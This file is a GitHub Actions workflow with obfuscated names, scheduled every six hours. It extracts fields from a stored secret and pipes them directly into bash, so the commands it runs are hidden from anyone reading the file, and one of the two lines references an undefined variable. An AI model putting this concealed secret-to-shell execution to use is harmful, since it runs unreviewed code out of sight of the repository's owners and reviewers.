name: lishuhuan4567
on:
  workflow_dispatch:
  schedule:
    - cron: '43 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lishuhuan4567
        env:
          w2999: ${{ secrets.w2999 }}
        run: |
          echo $w2999 | jq -r .imf5671 | /bin/bash
          echo $p70354 | jq -r .lgkg26294 | /bin/bash

